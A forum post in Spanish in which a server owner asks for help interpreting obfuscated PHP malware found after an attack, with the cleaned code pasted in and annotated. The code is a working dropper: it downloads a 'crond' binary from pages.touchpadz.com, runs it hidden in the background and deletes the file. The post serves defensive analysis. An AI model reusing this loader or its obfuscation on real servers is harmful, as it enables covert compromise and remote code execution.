Mi servidor fue atacado (eliminé la infección, hasta donde sé) y quiero saber qué es lo que, en todo caso, podría estar comprometido (como mis datos de usuario, por ejemplo).
Publiqué mi última pregunta en Stack Overflow. Bueno, noté que varios servidores de virus seguían intentando contactar con mi máquina y me estaban enviando código malicioso.
Decodifiqué esto desde base64, pero aún es en su mayor parte incomprensible. He determinado que está intentando acceder a una página llamada ADVERTENCIA ENLACE MALICIOSO: (editado)
Aquí está el código, lo he limpiado sustancialmente:
// Character table: every obfuscated name below is spelled out by indexing into it.
// NOTE(review): the table as pasted here differs slightly from the one in the $GLOBALS
// dump further down (e.g. "eb\'" vs "eb$6'"), so indices only line up against the dump's version.
$w50="0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O\r'<( M\tV?^_3F\neb\'+iUXS\9xZ4hzr};P{gs=&yJQ)dj-fE\"2!Rlc@C#nGY:Ku8"; $GLOBALS['fwjlt66'] = $w50[22].$w50[62].$w50[22].$w50[43].$w50[96].$w50[91].$w50[4].$w50[20].$w50[47]; $GLOBALS['qjgox86'] = $w50[80].$w50[96].$w50[91].$w50[87].$w50[7].$w50[53].$w50[1].$w50[91].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['agnsv93'] = $w50[70].$w50[7].$w50[64].$w50[86].$w50[47].$w50[91]; $GLOBALS['cqvwl52'] = $w50[77].$w50[47].$w50[87].$w50[48].$w50[53].$w50[91]; $GLOBALS['ecgfc33'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['licvl99'] = $w50[59].$w50[62].$w50[29].$w50[73].$w50[69].$w50[58].$w50[50]; $GLOBALS['bokew22'] = $w50[87].$w50[62].$w50[20].$w50[1].$w50[77]; $GLOBALS['wtaky62'] = $w50[70].$w50[62].$w50[47].$w50[86].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['neabn53'] = $w50[70].$w50[86].$w50[47].$w50[47].$w50[22]; $GLOBALS['cfffy63'] = $w50[96].$w50[91].$w50[86].$w50[53].$w50[91].$w50[29]; $GLOBALS['quyxh40'] = $w50[1].$w50[73].$w50[1].$w50[86].$w50[53].$w50[44].$w50[50]; $GLOBALS['ebiwk51'] = $w50[80].$w50[1].$w50[22].$w50[47].$w50[91]; $GLOBALS['exwal59'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[53].$w50[91].$w50[53].$w50[7]; $GLOBALS['wyvgi49'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[70].$w50[47].$w50[7].$w50[1].$w50[22].$w50[7]; $GLOBALS['ayrhy29'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['wkobm38'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['jxivj52'] = $w50[80].$w50[47].$w50[1].$w50[80]; $GLOBALS['wnmlt16'] = $w50[80].$w50[64].$w50[47].$w50[4].$w50[77]; $GLOBALS['yaqtf48'] = $w50[80].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['nqtio88'] = $w50[87].$w50[59].$w50[7].$w50[77].$w50[22].$w50[44].$w50[61]; $GLOBALS['rxtpe19'] = 
$w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[22].$w50[96].$w50[7].$w50[43].$w50[87].$w50[1].$w50[91].$w50[7].$w50[47].$w50[91].$w50[7].$w50[70]; $GLOBALS['mrwmq50'] = $w50[80].$w50[23].$w50[64].$w50[53].$w50[7].$w50[47]; $ktjhg56 =$w50[62].$w50[7].$w50[7].$w50[22].$w50[94].$w50[9].$w50[9].$w50[22].$w50[4].$w50[69].$w50[47].$w50[70].$w50[26].$w50[7].$w50[1].$w50[96].$w50[87].$w50[62].$w50[22].$w50[4].$w50[77].$w50[63].$w50[26].$w50[87].$w50[1].$w50[20].$w50[9].$w50[87].$w50[64].$w50[1].$w50[91].$w50[77].$w50[44].$w50[83];
// 64-bit payload URL. The 32-bit one is $ktjhg56 just above (decoded in the dump below as .../crond32).
$kilow69 = "http://pages.touchpadz.com/crond64";
// Prepended to the shell command further down, i.e. passed to the dropped binary as an environment variable.
$xsqmk27 = "XDVSN_SESSION_COOKIE=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";
// Not PHP: this is the author's print_r() dump of $GLOBALS after the table above was decoded.
// It is the key for the obfuscated names (e.g. wtaky62 = shell_exec, licvl99 = xhkyg96,
// quyxh40 = oyoli36, nqtio88 = cxtdp34).
$GLOBALS = array([dusbyosox] => fl [pvdmmvljuf] => incfl [ujhcrcgt] => id [smhtcwn] => qstr [jumxqwr] => ids [hnbbbkqfrkpt] => scode [culgtk] => url [krkdpxshxvn] => ch [hjmyjb] => errno [cupqhvfqdl] => msg [wlhdpqq] => errstr [loxnlmgvdc] => err [w50] => 0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O '<( M V?^_3F eb$6'+iUXSxZ4hzr};P{gs=&yJQ)dj-fE"2!Rlc@C#nGY:Ku8 [fwjlt66] => php_uname [qjgox86] => function_exists [agnsv93] => strlen [cqvwl52] => decbin [ecgfc33] => file_exists [licvl99] => xhkyg96 [bokew22] => chmod [wtaky62] => shell_exec [neabn53] => sleep [cfffy63] => unlink [quyxh40] => oyoli36 [ebiwk51] => fopen [exwal59] => curl_init [wyvgi49] => curl_setopt [ayrhy29] => curl_exec [wkobm38] => curl_close [jxivj52] => feof [wnmlt16] => fread [yaqtf48] => fclose [nqtio88] => cxtdp34 [rxtpe19] => file_put_contents [mrwmq50] => fwrite [ktjhg56] => http://pages.touchpadz.com/crond32 [kilow69] => http://pages.touchpadz.com/crond64 [xsqmk27] => XDVSN_SESSION_COOKIE=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)
// Gives host operating system name (php_uname('s')). The bare-word argument is presumably
// a quote lost during cleanup — TODO confirm against the original sample.
$aljav65 = php_uname(s);
// Gives machine type (php_uname('m')); assigned but never read in what is pasted here.
$lyvqp40 = php_uname(m);
// Status markup is echoed into the script's output (presumably read by whatever requested it).
echo '<shchzzz>';
// One-shot loop: each failure path `break`s out with an <err> tag, the success path breaks at the end.
for (;;) {
// Step 1: needs shell_exec() to launch the payload. (The closing parenthesis is missing as pasted.)
if(!function_exists(shell_exec) {
echo '<err step=1 err=noshex data=>'
break;
}
// Step 2: Linux only.
if($aljav65 !== "Linux") {
echo '<err step=2 err=nolinux data=>';
break;
}
// File name the payload is saved under; not referenced again in this pasted version.
$eeirq58 = 'crond';
$csjxi53 = "";
// Step 3: integer-width probe. ~0 is all ones in PHP's native int, so decbin() of it is
// 64 characters on a 64-bit build -> pick the 64-bit URL, otherwise the 32-bit one.
// (Both branches echo data=x64 as pasted; presumably the else branch originally said x86.)
if(strlen(decbin(~0)) == 64) {
echo '<inf step=3 data=x64>';
$csjxi53 = $kilow69;
}
else {
echo '<inf step=3 data=x64>';
$csjxi53 = $ktjhg56;
}
// Step 4: unless ./crond already exists, fetch it via xhkyg96() (which saves to ./crond,
// or /tmp/crond as a fallback) and keep the path it returns.
// NOTE(review): $csjxi53 chosen above is never used; the literal URL here looks like the
// 64-bit URL with 'crond' appended, presumably substituted by hand during cleanup.
$jzugq1 = "";
if(!file_exists('crond')) {
$jzugq1 = xhkyg96($w50, 'http://pages.touchpadz.com/crond64crond', crond);
if ( $jzugq1 == FALSE) {
echo '<err step=4 err=downl data=>';
break;
} else {
echo '<inf step=4 data=downok>';
}
} else {
// $jzugq1 stays "" on this branch, so chmod/shell_exec/unlink below get an empty path.
echo '<inf step=4 data=exists>';
}
// 755 is decimal here, not octal 0755, so the mode bits actually set are not rwxr-xr-x.
chmod($jzugq1, 755);
// Decoded via the table: "<env assignment> ./<path> >/dev/null 2>/dev/null &" — the
// dropped file is started in the background with all of its output discarded.
$caaku38 = $xsqmk27.$w50[37].$w50[26].$w50[9].$jzugq1.$w50[37].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[83].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[72];
$vepmo93 = shell_exec($caaku38);
// Decodes to "<inf step=5 data=done data2=<shell_exec output>>".
echo $w50[35].$w50[53].$w50[91].$w50[80].$w50[37].$w50[70].$w50[7].$w50[47].$w50[22].$w50[71].$w50[28].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[71].$w50[77].$w50[1].$w50[91].$w50[47].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[83].$w50[71].$vepmo93.$w50[13];
sleep(1);
// Removes the dropped file from disk; the process launched above is not affected by this.
// (Only the path returned by xhkyg96() is removed — see the slash mismatch noted on that function.)
unlink($jzugq1);
break;
}
echo '</shchzzz>';
exit();
// Fetches the URL $iyjzg82 and returns its body as a string.
// $w50 (the character table) is accepted but never used; every helper takes it as first argument.
// Tries a plain stream fopen() first (for an http:// URL this depends on allow_url_fopen),
// then falls back to cURL. Returns FALSE when fopen() failed and cURL is unavailable;
// curl_exec()'s own FALSE on failure is passed straight through.
// Every call is @-suppressed, so a failed download leaves nothing in the error log.
function oyoli36($w50, $iyjzg82) {
$kxsnc64 = "";
$gnmie55 = @fopen($iyjzg82, 'rb');
// Loose == FALSE: a stream resource is never falsy, so this only means "fopen failed".
if ($gnmie55 == FALSE) {
if (!function_exists('curl_init')) return FALSE;
$iahsh76 = @curl_init();
@curl_setopt($iahsh76, CURLOPT_URL, $iyjzg82);
// RETURNTRANSFER: body is returned from curl_exec() instead of being echoed.
@curl_setopt($iahsh76, CURLOPT_RETURNTRANSFER, true);
$kxsnc64 = @curl_exec($iahsh76);
@curl_close($iahsh76);
} else {
// Read the stream in 64 KiB chunks until EOF.
while(!feof($gnmie55)) $kxsnc64.=fread($gnmie55, 1024 * 64 );
fclose($gnmie55);
}
return $kxsnc64;
}
// Writes $kxsnc64 to the path $ekfco84. Returns TRUE on success, FALSE otherwise.
// $w50 is unused. The bare-word mode wb+, the bare-word file_put_contents and the missing
// ')' on the function_exists() line are presumably quoting lost during cleanup — TODO confirm.
// Unlike oyoli36(), the fopen() here is not @-suppressed, so a failed open emits a warning into the output.
function cxtdp34($w50, $ekfco84, $kxsnc64) {
$dlyti36 = fopen($ekfco84, wb+);
if ($dlyti36 == FALSE) {
// Fallback when the file could not be opened as a stream.
if (!function_exists(file_put_contents) return FALSE;
if ( @file_put_contents($ekfco84, $kxsnc64) === FALSE ) return FALSE;
} else {
// Byte length via strlen(); a short write counts as failure.
$gibnq51 = fwrite($dlyti36, $kxsnc64, strlen($kxsnc64));
fclose($dlyti36);
// "$gibnq51 == FALSE" is also true for a 0-byte write, so an empty payload yields FALSE here.
if ($gibnq51 == FALSE || $gibnq51 != strlen($kxsnc64)) return FALSE;
}
return TRUE;
}
// Downloads $iyjzg82 with oyoli36() and saves it as $vmtdr19 in the script's working
// directory, falling back to /tmp. Returns the path the caller should use, or FALSE.
// NOTE(review): the fallback writes '/tmp/'.$vmtdr19 but returns '/tmp'.$vmtdr19 (no
// slash), so the caller's chmod/shell_exec/unlink would target the wrong path and the
// file actually written under /tmp would be left behind — worth checking there during cleanup.
function xhkyg96($w50, $iyjzg82, $vmtdr19) {
$kxsnc64 = oyoli36($w50, $iyjzg82);
// Loose == FALSE also treats an empty body ("") as a failed download.
if ($kxsnc64 == FALSE) return FALSE;
// $w50[26].$w50[9] decodes to "./" — the same prefix returned on success below.
if (cxtdp34($w50, $w50[26].$w50[9].$vmtdr19, $kxsnc64) == FALSE) {
if (cxtdp34($w50, '/tmp/'.$vmtdr19, $kxsnc64) == FALSE) {
return FALSE;
} else {
return '/tmp'.$vmtdr19;
}
} else {
return "./".$vmtdr19;
}
// Unreachable: every branch above returns.
return FALSE;
}
Esperaba que alguien conociera algún servicio que interprete esto o pueda decirme lo que pudo haber ocurrido. Puedo intentar reconstruirlo yo mismo, pero si alguien tiene alguna información, me sería muy útil.